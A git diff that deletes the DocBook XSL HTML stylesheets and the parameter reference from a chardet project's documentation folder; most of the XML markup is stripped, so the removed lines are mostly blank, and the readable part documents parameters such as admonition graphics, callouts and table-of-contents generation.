    diff --git a/chardet/docs/docbook/xsl/html/html-rtf.xsl b/chardet/docs/docbook/xsl/html/html-rtf.xsl deleted file mode 100644 index f52c19f..0000000 --- a/chardet/docs/docbook/xsl/html/html-rtf.xsl +++ /dev/null @@ -1,335 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    -
    - - - - - - - - - - -
    -
    -
    -
    - - - - - - - - - - - - - - -
    -
    - - - - - - - - - - -
    -
    -
    -
    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    diff --git a/chardet/docs/docbook/xsl/html/html.xsl b/chardet/docs/docbook/xsl/html/html.xsl deleted file mode 100644 index 6e9242c..0000000 --- a/chardet/docs/docbook/xsl/html/html.xsl +++ /dev/null @@ -1,90 +0,0 @@ - - - - - - - - - - - - - - -
    - - - - - - - # - - - - - - - - - # - - - - - - - - - - - - - - - - - bullet - - - - - - - - - bullet - - - © - - - ® - (SM) -   - - - - - - - - - - - - - - - - diff --git a/chardet/docs/docbook/xsl/html/htmltbl.xsl b/chardet/docs/docbook/xsl/html/htmltbl.xsl deleted file mode 100644 index 6a82990..0000000 --- a/chardet/docs/docbook/xsl/html/htmltbl.xsl +++ /dev/null @@ -1,55 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - diff --git a/chardet/docs/docbook/xsl/html/index.xsl b/chardet/docs/docbook/xsl/html/index.xsl deleted file mode 100644 index 042d121..0000000 --- a/chardet/docs/docbook/xsl/html/index.xsl +++ /dev/null @@ -1,196 +0,0 @@ - - - - - - - - - - - - - - - -
    - - - - - - - - - - - - - - - - - - -
    -
    -
    - - - - - - - - - -
    - - - - - - - - - - - - - - - - - - -
    -
    -
    - - - - - - - - -
    - - - - - - - - -
    - -
    -
    -
    - - -

    - -

    -
    - - - - - - - - - -
    - - - - - - - - - - - - -
    - -
    - - -
    -
    - -
    -
    -
    - -
    -
    - -
    -
    -
    -
    -
    - - -
    - -
    - - -
    -
    - -
    -
    -
    - -
    -
    - -
    -
    -
    -
    -
    - - -
    - -
    - -
    -
    - -
    -
    -
    -
    - - -
    - -
    -
    - - diff --git a/chardet/docs/docbook/xsl/html/info.xsl b/chardet/docs/docbook/xsl/html/info.xsl deleted file mode 100644 index 2920580..0000000 --- a/chardet/docs/docbook/xsl/html/info.xsl +++ /dev/null @@ -1,53 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - diff --git a/chardet/docs/docbook/xsl/html/inline.xsl b/chardet/docs/docbook/xsl/html/inline.xsl deleted file mode 100644 index ef7925b..0000000 --- a/chardet/docs/docbook/xsl/html/inline.xsl +++ /dev/null @@ -1,1128 +0,0 @@ - - - - - - - - - - - - - - -
    - - - - - - - - - - - - - - - - - - - - - - - - - - - - XLink to nonexistent id: - - - ??? - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ( - - ) - - - - - - - - - - - , - - - - - - - , - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://example.com/cgi-bin/man.cgi? - - ( - - ) - - - - - - - - - - - - - - - - - - - - - - - - - - emphasis - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - SM - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Warning: glossary.collection specified, but there are - - automatic glossaries - - - - - - - - - - - - - - - - - - - - - - - - There's no entry for - - in - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Error: no glossentry for glossterm: - - . - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - element - - - - - - - - - - - - - - - - </ - - > - - - & - - ; - - - &# - - ; - - - % - - ; - - - <? - - > - - - <? - - ?> - - - < - - > - - - < - - /> - - - <!-- - - --> - - - - - - - - - - - - < - - mailto: - - - > - - - - - - - - - - + - - - - - - - - - - - - - - - - - - - - - - - - - - - - ( - - ) - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - [ - - ] - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - diff --git a/chardet/docs/docbook/xsl/html/keywords.xsl b/chardet/docs/docbook/xsl/html/keywords.xsl deleted file mode 100644 index eab9858..0000000 --- a/chardet/docs/docbook/xsl/html/keywords.xsl +++ /dev/null @@ -1,35 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - , - - - - - diff --git a/chardet/docs/docbook/xsl/html/lists.xsl b/chardet/docs/docbook/xsl/html/lists.xsl deleted file mode 100644 index a86b9ab..0000000 --- a/chardet/docs/docbook/xsl/html/lists.xsl +++ /dev/null @@ -1,1051 +0,0 @@ - - - - - - - - -
    - - - - - - - - -
      - - - - - - - - - - - - -
    -
    -
    - - - - - - - - - - - - - - - - - - - - - - - circle - disc - square - - - - - - -
  • - - - list-style-type: - - - - - - - - - - - -
    - -
    -
    - - - -
    -
  • -
    - - - - - - - - - - - - - - - - - - 1 - - - - - - - - - - 1 - a - i - A - I - - - - Unexpected numeration: - - - - - - - -
    - - - - - - - - - -
      - - - - - - - - - - - - - - - - -
    -
    -
    - - - - - - -
  • - - - - - - - - - - - - - -
    - -
    -
    - - - -
    -
  • -
    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    -
    - - - -
    - -
    -
    -
    -
    -
    - - - - - - - - - - - - - - - - - - - - - - - - - -

    - - - - - - - - -

    -
    -
    -
    - - -
    - - -
    -
    - -
    -
    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - , - - - - - - - - - - - - - -
    - -
    -
    - - - -
    -
    - - - - - - - - - - - - - - 1 - - - -
    -
    - - - - - - - - - - - - - - - - - - 1 - - - -
    -
    - - - - - - - - - - - 1 - - - -
    -
    - - - 1 - 1 - - - - - - - - - - - - - - - - - - - - - - - - - 1 - 1 - - 1 - - - - - - - - -   - - - - - - - - - - - - - - 1 - 1 - - - - - - - - - - - - - - - - - - - - - - - - - - - - 1 - 1 - 1 - - 1 - - - - - - - - -   - - - - - - - - - - - - - - - - - - - - - , - - - - - - - - - - - - - - - - - before - - - - - - - - - -
    - - - - - - - - - - -
      - -
    -
    - -
      - - - - -
    -
    -
    - - - - -
    -
    - - - - - - - - - - - - -
      - -
    -
    - - -
  • - - -
  • -
    - - - -
      - -
    -
    - - -

    - - - -

    -
    - - - - - - - - - - - -
    - - - - - - - - - - - - - - - - -
    -
    - - -

    -
    - - - - - - - - - - - - - - - - - - - -

    - - - : - - -

    -
    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    -
    - - - - - - - - - - - - - - - - - - - - - - - - - -
    - - - - - - - - -
    -
    - -
    -
    -
    -
    -
    - - - - - - - - - - - - - - - - - - - - - - - - - - -
    - - - - -
    -
    -
    -
    -
    - - - - - - - - - -

    - - - - - - - - -

    -
    -
    -
    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ??? - - - - - # - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ??? - - - - - - -
    - diff --git a/chardet/docs/docbook/xsl/html/maketoc.xsl b/chardet/docs/docbook/xsl/html/maketoc.xsl deleted file mode 100644 index eda0fa7..0000000 --- a/chardet/docs/docbook/xsl/html/maketoc.xsl +++ /dev/null @@ -1,83 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - filename=" - - " - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - diff --git a/chardet/docs/docbook/xsl/html/manifest.xsl b/chardet/docs/docbook/xsl/html/manifest.xsl deleted file mode 100644 index 812e1af..0000000 --- a/chardet/docs/docbook/xsl/html/manifest.xsl +++ /dev/null @@ -1,100 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - diff --git a/chardet/docs/docbook/xsl/html/math.xsl b/chardet/docs/docbook/xsl/html/math.xsl deleted file mode 100644 index 2d9229e..0000000 --- a/chardet/docs/docbook/xsl/html/math.xsl +++ /dev/null @@ -1,262 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Unsupported TeX math notation: - - - - - - - - - - - - - \nopagenumbers - - - - \bye - - - - - - - - - - - - - - - - - - - - - - - \special{dvi2bitmap outputfile - - } - - $ - - - - $ - - \vfill\eject - - - - - - - - - - - - - - - - - - - - - - - - \special{dvi2bitmap outputfile - - } - - $$ - - - - $$ - - \vfill\eject - - - - - - - - - \documentclass{article} - \pagestyle{empty} - \begin{document} - - - - \end{document} - - - - - - - - - - - - - - - - - - - - - - - \special{dvi2bitmap outputfile - - } - - $ - - - - $ - - \newpage - - - - - - - - - - - - - - - - - - - - - - - - \special{dvi2bitmap outputfile - - } - - $$ - - - - $$ - - \newpage - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 0 - 0 - 1 - - - - - - diff --git a/chardet/docs/docbook/xsl/html/oldchunker.xsl b/chardet/docs/docbook/xsl/html/oldchunker.xsl deleted file mode 100644 index e84744f..0000000 --- a/chardet/docs/docbook/xsl/html/oldchunker.xsl +++ /dev/null @@ -1,202 +0,0 @@ - - - - - - - - - - - - - -Encoding used in generated HTML pages - -This encoding is used in files generated by chunking stylesheet. Currently -only Saxon is able to change output encoding. - - - - - - - - - -Saxon character representation used in generated HTML pages - -This character representation is used in files generated by chunking stylesheet. If -you want to suppress entity references for characters with direct representation -in default.encoding, set this parameter to value native. - - - - - - - - - - - - - - - - - - - - - - - - Chunking isn't supported with - - - - - - - - - - - - - - - Writing - - - for - - - ( - - ) - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Can't make chunks with - - 's processor. - - - - - - - - - - - - - - - - Writing - - - for - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Can't make chunks with - - 's processor. - - - - - - diff --git a/chardet/docs/docbook/xsl/html/onechunk.xsl b/chardet/docs/docbook/xsl/html/onechunk.xsl deleted file mode 100644 index 5f7a661..0000000 --- a/chardet/docs/docbook/xsl/html/onechunk.xsl +++ /dev/null @@ -1,37 +0,0 @@ - - - - - - - - - - - - - - - -1 - - - - # - - - - - - diff --git a/chardet/docs/docbook/xsl/html/param.ent b/chardet/docs/docbook/xsl/html/param.ent deleted file mode 100644 index 282451f..0000000 --- a/chardet/docs/docbook/xsl/html/param.ent +++ /dev/null @@ -1,254 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - diff --git a/chardet/docs/docbook/xsl/html/param.xml b/chardet/docs/docbook/xsl/html/param.xml deleted file mode 100644 index 19336bd..0000000 --- a/chardet/docs/docbook/xsl/html/param.xml +++ /dev/null @@ -1,7460 +0,0 @@ - - - - -HTML Parameter Reference - -$Id: param.xml,v 1.1.1.1 2004/06/22 02:10:20 f8dy Exp $ - - - Walsh - Norman - - - 1999 - 2000 - 2001 - Norman Walsh - - - -Introduction - -This is technical reference documentation for the DocBook XSL -Stylesheets; it documents (some of) the parameters, templates, and -other elements of the stylesheets. - -This reference describes each of the HTML Stylesheet parameters. -These are the easily customizable parts of the stylesheet. -If you want to specify an alternate value for one or more of these -parameters, you can do so in a driver stylesheet. - -For example, if you want to change the html.stylesheet -to reference.css, you might create a driver -stylesheet like this: - -<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" - version='1.0'> - - <xsl:import href="http://docbook.sourceforge.net/release/xsl/snapshot/html/docbook.xsl"/> - - <xsl:param name="html.stylesheet">reference.css</xsl:param> - -</xsl:stylesheet> - -Naturally, you have to change the -href attribute on -<xsl:import> to point to -docbook.xsl on your system. (Or -chunk.xsl, if you're using chunking.) - -This is not intended to be user documentation. -It is provided for developers writing customization layers for the -stylesheets, and for anyone who's interested in how it -works. - -Although I am trying to be thorough, this documentation is known -to be incomplete. Don't forget to read the source, too :-) - - -Admonitions - - -admon.graphics.extension -string - - -admon.graphics.extension -Extension for admonition graphics - - - -<xsl:param name="admon.graphics.extension" select="'.png'"></xsl:param> - - -Description - -Sets the extension to use on admonition graphics. - - - - - - -admon.graphics.path -string - - -admon.graphics.path -Path to admonition graphics - - - -<xsl:param name="admon.graphics.path">images/</xsl:param> - - -Description - -Sets the path, probably relative to the directory where the HTML -files are created, to the admonition graphics. - - - - - - - -admon.graphics -boolean - - -admon.graphics -Use graphics in admonitions? - - - - -<xsl:param name="admon.graphics" select="0"></xsl:param> - - - -Description - -If true (non-zero), admonitions are presented in an alternate style that uses -a graphic. Default graphics are provided in the distribution. - - - - - - - -admon.textlabel -boolean - - -admon.textlabel -Use text label in admonitions? - - - - -<xsl:param name="admon.textlabel" select="1"></xsl:param> - - - -Description - -If true (non-zero), admonitions are presented with a generated -text label such as Note or Warning in the appropriate language. -If zero, such labels are turned off, but any title child -of the admonition element are still output. -The default value is 1. - - - - - - - -admon.style -string - - -admon.style -CSS style attributes for admonitions - - - -<xsl:param name="admon.style"> - <xsl:text>margin-left: 0.5in; margin-right: 0.5in;</xsl:text> -</xsl:param> - - -Description - -Specifies the value of the STYLE -attribute that should be added to admonitions. - - - - - - - -Callouts - - -callout.defaultcolumn -integer - - -callout.defaultcolumn -Indicates what column callouts appear in by default - - - -<xsl:param name="callout.defaultcolumn" select="'60'"></xsl:param> - - -Description - -If a callout does not identify a column (for example, if it uses -the linerange unit), -it will appear in the default column. - - - - - - - -callout.graphics.extension -string - - -callout.graphics.extension -Extension for callout graphics - - - -<xsl:param name="callout.graphics.extension" select="'.png'"></xsl:param> - - -Description - -Sets the extension to use on callout graphics. - - - - - - -callout.graphics.number.limit -integer - - -callout.graphics.number.limit -Number of the largest callout graphic - - - -<xsl:param name="callout.graphics.number.limit" select="'10'"></xsl:param> - - -Description - -If callout.graphics -is non-zero, graphics are used to represent -callout numbers. The value of -callout.graphics.number.limit -is -the largest number for which a graphic exists. If the callout number -exceeds this limit, the default presentation "(nnn)" will always -be used. - - - - - - - -callout.graphics.path -string - - -callout.graphics.path -Path to callout graphics - - - - -<xsl:param name="callout.graphics.path" select="'images/callouts/'"></xsl:param> - - - -Description - -Sets the path, probably relative to the directory where the HTML -files are created, to the callout graphics. - - - - - - - -callout.graphics -boolean - - -callout.graphics -Use graphics for callouts? - - - - -<xsl:param name="callout.graphics" select="'1'"></xsl:param> - - - -Description - -If non-zero, callouts are presented with graphics (e.g., reverse-video -circled numbers instead of "(1)", "(2)", etc.). -Default graphics are provided in the distribution. - - - - - - - -callout.list.table -boolean - - -callout.list.table -Present callout lists using a table? - - - -<xsl:param name="callout.list.table" select="'1'"></xsl:param> - - -Description - -The default presentation of CalloutLists uses -an HTML DL. Some browsers don't align DLs very well -if callout.graphics are used. With this option -turned on, CalloutLists are presented in an HTML -TABLE, which usually results in better alignment -of the callout number with the callout description. - - - - - - -callout.unicode.number.limit -integer - - -callout.unicode.number.limit -Number of the largest callout graphic - - - -<xsl:param name="callout.unicode.number.limit" select="'10'"></xsl:param> - - -Description - -If callout.unicode -is non-zero, unicode characters are used to represent -callout numbers. The value of -callout.unicode.number.limit -is -the largest number for which a unicode character exists. If the callout number -exceeds this limit, the default presentation "(nnn)" will always -be used. - - - - - - - -callout.unicode.start.character -integer - - -callout.unicode.start.character -First Unicode character to use, decimal value. - - - -<xsl:param name="callout.unicode.start.character" select="10102"></xsl:param> - - -Description - -If callout.graphics is zero and callout.unicode -is non-zero, unicode characters are used to represent -callout numbers. The value of -callout.unicode.start.character -is the decimal unicode value used for callout number one. Currently, -only 10102 is supported in the stylesheets for this parameter. - - - - - - - -callout.unicode -boolean - - -callout.unicode -Use Unicode characters rather than images for callouts. - - - -<xsl:param name="callout.unicode" select="0"></xsl:param> - - -Description - -The stylesheets can use either an image of the numbers one to ten, or the single Unicode character which represents the numeral, in white on a black background. Use this to select the Unicode character option. - - - - - - - -callouts.extension -boolean - - -callouts.extension -Enable the callout extension - - - -<xsl:param name="callouts.extension" select="'1'"></xsl:param> - - -Description - -The callouts extension processes areaset -elements in ProgramListingCO and other text-based -callout elements. - - - - - - - -EBNF - - -ebnf.table.bgcolor -string - - -ebnf.table.bgcolor -Background color for EBNF tables - - - -<xsl:param name="ebnf.table.bgcolor" select="'#F5DCB3'"></xsl:param> - - -Description - -Sets the background color for EBNF tables. No bgcolor -attribute is output if ebnf.table.bgcolor is set to -the null string. The default value matches the value used in recent -online versions of the W3C's XML Spec productions. - - - - - - -ebnf.table.border - - - -ebnf.table.border -Selects border on EBNF tables - - - -<xsl:param name="ebnf.table.border" select="1"></xsl:param> - - -Description - -Selects the border on EBNF tables. If non-zero, the tables have -borders, otherwise they don't. - - - - - - -ebnf.assignment -rtf - - -ebnf.assignment -The EBNF production assignment operator - - - - -<xsl:param name="ebnf.assignment"> -<tt>::=</tt> -</xsl:param> - - - - -Description - -The ebnf.assignment parameter determines what -text is used to show assignment in productions -in productionsets. - -While ::= is common, so are several -other operators. - - - - - - -ebnf.statement.terminator -rtf - - -ebnf.statement.terminator -Punctuation that ends an EBNF statement. - - - - -<xsl:param name="ebnf.statement.terminator"></xsl:param> - - - - -Description - -The ebnf.statement.terminator parameter determines what -text is used to terminate each production -in productionset. - -Some notations end each statement with a period. - - - - - - -ToC/LoT/Index Generation - - -annotate.toc -boolean - - -annotate.toc -Annotate the Table of Contents? - - - -<xsl:param name="annotate.toc" select="1"></xsl:param> - - -Description - -If true, TOCs will be annotated. At present, this just means -that the RefPurpose of RefEntry -TOC entries will be displayed. - - - - - - - -autotoc.label.separator -string - - -autotoc.label.separator -Separator between labels and titles in the ToC - - - -<xsl:param name="autotoc.label.separator" select="'. '"></xsl:param> - - -Description - -String to use to seperate labels and title in a table of contents. - - - - - - -process.source.toc -boolean - - -process.source.toc -FIXME: - - - -<xsl:param name="process.source.toc" select="0"></xsl:param> - - -Description - -FIXME: - - - - - - - -process.empty.source.toc -boolean - - -process.empty.source.toc -FIXME: - - - -<xsl:param name="process.empty.source.toc" select="0"></xsl:param> - - -Description - -FIXME: - - - - - - - -bridgehead.in.toc -boolean - - -bridgehead.in.toc -Should bridgehead elements appear in the TOC? - - - -<xsl:param name="bridgehead.in.toc" select="0"></xsl:param> - - -Description - -If non-zero, bridgeheads appear in the TOC. Note that this option -is not fully supported and may be removed in a future version of the -stylesheets. - - - - - - - -manual.toc -string - - -manual.toc -An explicit TOC to be used for the TOC - - - - -<xsl:param name="manual.toc" select="''"></xsl:param> - - - -Description - -The manual.toc identifies an explicit TOC that -will be used for building the printed TOC. - - - - - - - -toc.list.type -list -dl -ul -ol - - -toc.list.type -Type of HTML list element to use for Tables of Contents - - - -<xsl:param name="toc.list.type">dl</xsl:param> - - -Description - -When an automatically generated Table of Contents (or List of Titles) -is produced, this HTML element will be used to make the list. - - - - - - - -toc.section.depth -integer - - -toc.section.depth -How deep should recursive sections appear -in the TOC? - - - -<xsl:param name="toc.section.depth">2</xsl:param> - - -Description - -Specifies the depth to which recursive sections should appear in the -TOC. - - - - - - - -toc.max.depth -integer - - -toc.max.depth -How maximaly deep should be each TOC? - - - -<xsl:param name="toc.max.depth">8</xsl:param> - - -Description - -Specifies the maximal depth of TOC on all levels. - - - - - - -generate.toc -table - - -generate.toc -Control generation of ToCs and LoTs - - - - -<xsl:param name="generate.toc"> -appendix toc,title -article/appendix nop -article toc,title -book toc,title,figure,table,example,equation -chapter toc,title -part toc,title -preface toc,title -qandadiv toc -qandaset toc -reference toc,title -sect1 toc -sect2 toc -sect3 toc -sect4 toc -sect5 toc -section toc -set toc,title -</xsl:param> - - - - -Description - -This parameter has a structured value. It is a table of space-delimited -path/value pairs. Each path identifies some element in the source document -using a restricted subset of XPath (only the implicit child axis, no wildcards, -no predicates). Paths can be either relative or absolute. - -When processing a particular element, the stylesheets consult this table to -determine if a ToC (or LoT(s)) should be generated. - -For example, consider the entry: - -book toc,figure - -This indicates that whenever a book is formatted, a -Table Of Contents and a List of Figures should be generated. Similarly, - -/chapter toc - -indicates that whenever a document that has a root -of chapter is formatted, a Table of -Contents should be generated. The entry chapter would match -all chapters, but /chapter matches only chapter -document elements. - -Generally, the longest match wins. So, for example, if you want to distinguish -articles in books from articles in parts, you could use these two entries: - -book/article toc,figure -part/article toc - -Note that an article in a part can never match a book/article, -so if you want nothing to be generated for articles in parts, you can simply leave -that rule out. - -If you want to leave the rule in, to make it explicit that you're turning -something off, use the value nop. For example, the following -entry disables ToCs and LoTs for articles: - -article nop - -Do not simply leave the word article in the file -without a matching value. That'd be just begging the silly little -path/value parser to get confused. - -Section ToCs are further controlled by the -generate.section.toc.level parameter. -For a given section level to have a ToC, it must have both an entry in -generate.toc and be within the range enabled by -generate.section.toc.level. - - - - - -generate.section.toc.level -integer - - -generate.section.toc.level -Control depth of TOC generation in sections - - - - -<xsl:param name="generate.section.toc.level" select="0"></xsl:param> - - - -Description - -The generate.section.toc.level parameter -controls the depth of section in which TOCs will be generated. Note -that this is related to, but not the same as -toc.section.depth, which controls the depth to -which TOC entries will be generated in a given TOC. -If, for example, generate.section.toc.level -is 3, TOCs will be generated in first, second, and third -level sections, but not in fourth level sections. - - - - - - - -generate.index -boolean - - -generate.index -Do you want an index? - - - -<xsl:param name="generate.index" select="1"></xsl:param> - - -Description - -Specify if an index should be generated. - - - - - - -Extensions - - -linenumbering.everyNth -integer - - -linenumbering.everyNth -Indicate which lines should be numbered - - - -<xsl:param name="linenumbering.everyNth" select="'5'"></xsl:param> - - -Description - -If line numbering is enabled, everyNth line will be numbered. - - - - - - - -linenumbering.extension -boolean - - -linenumbering.extension -Enable the line numbering extension - - - -<xsl:param name="linenumbering.extension" select="'1'"></xsl:param> - - -Description - -If true, verbatim environments (elements that have the -format='linespecific' notation attribute: address, literallayout, -programlisting, screen, synopsis) that specify line numbering will -have, surprise, line numbers. - - - - - - - -linenumbering.separator -string - - -linenumbering.separator -Specify a separator between line numbers and lines - - - -<xsl:param name="linenumbering.separator" select="' '"></xsl:param> - - -Description - -The separator is inserted between line numbers and lines in -the verbatim environment. - - - - - - - -linenumbering.width -integer - - -linenumbering.width -Indicates the width of line numbers - - - -<xsl:param name="linenumbering.width" select="'3'"></xsl:param> - - -Description - -If line numbering is enabled, line numbers will appear right -justified in a field "width" characters wide. - - - - - - - -tablecolumns.extension -boolean - - -tablecolumns.extension -Enable the table columns extension function - - - -<xsl:param name="tablecolumns.extension" select="'1'"></xsl:param> - - -Description - -The table columns extension function adjusts the widths of table -columns in the HTML result to more accurately reflect the specifications -in the CALS table. - - - - - - - -textinsert.extension -boolean - - -textinsert.extension -Enable the textinsert extension element - - - -<xsl:param name="textinsert.extension" select="'1'"></xsl:param> - - -Description - -The textinsert extension element inserts the contents of a -a file into the result tree (as text). - - - - - - - -graphicsize.extension -boolean - - -graphicsize.extension -Enable the getWidth()/getDepth() extension functions - - - - -<xsl:param name="graphicsize.extension" select="1"></xsl:param> - - - -Description - -If non-zero (and if use.extensions is non-zero -and if you're using a processor that supports extension functions), the -getWidth and getDepth functions -will be used to extract image sizes from graphics. - - - - - - -use.extensions -boolean - - -use.extensions -Enable extensions - - - -<xsl:param name="use.extensions" select="'0'"></xsl:param> - - -Description - -If non-zero, extensions may be used. Each extension is -further controlled by its own parameter. But if -use.extensions is zero, no extensions will -be used. - - - - - - - -Automatic labelling - - -chapter.autolabel -boolean - - -chapter.autolabel -Are chapters automatically enumerated? - - - -<xsl:param name="chapter.autolabel" select="1"></xsl:param> - - -Description - -If true (non-zero), unlabeled chapters will be enumerated. - - - - - - - -appendix.autolabel -boolean - - -appendix.autolabel -Are Appendixes automatically enumerated? - - - -<xsl:param name="appendix.autolabel" select="1"></xsl:param> - - -Description - -If true (non-zero), unlabeled appendixes will be -enumerated. - - - - - - - -part.autolabel -boolean - - -part.autolabel -Are parts and references enumerated? - - - -<xsl:param name="part.autolabel" select="1"></xsl:param> - - -Description - -If true (non-zero), unlabeled parts and references will be enumerated. - - - - - - - -preface.autolabel -boolean - - -preface.autolabel -Are prefaces enumerated? - - - -<xsl:param name="preface.autolabel" select="0"></xsl:param> - - -Description - -If true (non-zero), unlabeled prefaces will be enumerated. - - - - - - - -qandadiv.autolabel -boolean - - -qandadiv.autolabel -Are divisions in QAndASets enumerated? - - - -<xsl:param name="qandadiv.autolabel" select="1"></xsl:param> - - -Description - -If true (non-zero), unlabeled qandadivs will be enumerated. - - - - - - - -section.autolabel -boolean - - -section.autolabel -Are sections enumerated? - - - -<xsl:param name="section.autolabel" select="0"></xsl:param> - - -Description - -If true (non-zero), unlabeled sections will be enumerated. - - - - - - - -section.label.includes.component.label -boolean - - -section.label.includes.component.label -Do section labels include the component label? - - - -<xsl:param name="section.label.includes.component.label" select="0"></xsl:param> - - -Description - -If true (non-zero), section labels are prefixed with the label of the -component that contains them. - - - - - - - -label.from.part -boolean - - -label.from.part -Renumber chapters in each part? - - - -<xsl:param name="label.from.part" select="'0'"></xsl:param> - - -Description - -If label.from.part is non-zero, components -(chapters, appendixes, etc.) -will be numbered from 1 in each part. Otherwise, -they will be numbered monotonically throughout each -book. - - - - - - - - - -HTML - - -html.base -uri - - -html.base -An HTML base URI - - - -<xsl:param name="html.base"></xsl:param> - - -Description - -If html.base is set, it is used for the BASE -element in the HEAD of the HTML documents. -This is useful for dynamically served HTML where the base URI needs -to be shifted. - - - - - - -html.stylesheet.type -string - - -html.stylesheet.type -The type of the stylesheet used in the generated HTML - - - -<xsl:param name="html.stylesheet.type">text/css</xsl:param> - - -Description - -The type of the stylesheet to place in the HTML link tag. - - - - - - - -html.stylesheet -string - - -html.stylesheet -Name of the stylesheet(s) to use in the generated HTML - - - - -<xsl:param name="html.stylesheet" select="''"></xsl:param> - - - -Description - -The html.stylesheet parameter is either empty, -indicating that no stylesheet LINK tag should be generated -in the HTML output, or it is a list of one or more stylesheets. - -Multiple stylesheets are space-delimited. If you need to -reference a stylesheet URI that includes a space, encode it with -%20. A seprate HTML LINK element will -be generated for each stylesheet in the order they are listed in the -parameter. - - - - - - -use.id.as.filename -boolean - - -use.id.as.filename -Use ID value of chunk elements as the filename? - - - -<xsl:param name="use.id.as.filename" select="'0'"></xsl:param> - - -Description - -If use.id.as.filename -is non-zero, the filename of chunk elements that have IDs will be -derived from the ID value. - - - - - - - -css.decoration -boolean - - -css.decoration -Enable CSS decoration of elements - - - - -<xsl:param name="css.decoration" select="1"></xsl:param> - - - -Description - - -If css.decoration is turned on, then HTML elements -produced by the -stylesheet may be decorated with STYLE attributes. For example, the -LI tags produced for list items may include a fragment of CSS in the -STYLE attribute which sets the CSS property "list-style-type". - - - - - - - -spacing.paras -boolean - - -spacing.paras -Insert additional <p> elements for spacing? - - - -<xsl:param name="spacing.paras" select="'0'"></xsl:param> - - -Description - -When non-zero, additional, empty paragraphs are inserted in -several contexts (for example, around informal figures), to create a -more pleasing visual appearance in many browsers. - - - - - - - -emphasis.propagates.style -boolean - - -emphasis.propagates.style -Pass emphasis role attribute through to HTML? - - - - -<xsl:param name="emphasis.propagates.style" select="1"></xsl:param> - - - -Description - -If true, the role attribute of emphasis elements -will be passed through to the HTML as a class attribute on a -span that surrounds the emphasis. - - - - - - -para.propagates.style -boolean - - -para.propagates.style -Pass para role attribute through to HTML? - - - - -<xsl:param name="para.propagates.style" select="1"></xsl:param> - - - -Description - -If true, the role attribute of para elements -will be passed through to the HTML as a class attribute on the -p generated for the paragraph. - - - - - - -phrase.propagates.style -boolean - - -phrase.propagates.style -Pass phrase role attribute through to HTML? - - - -<xsl:param name="phrase.propagates.style" select="1"></xsl:param> - - -Description - -If true, the role attribute of phrase elements -will be passed through to the HTML as a class attribute on a -span that surrounds the phrase. - - - - - - -entry.propagates.style -boolean - - -entry.propagates.style -Pass entry role attribute through to HTML? - - - - -<xsl:param 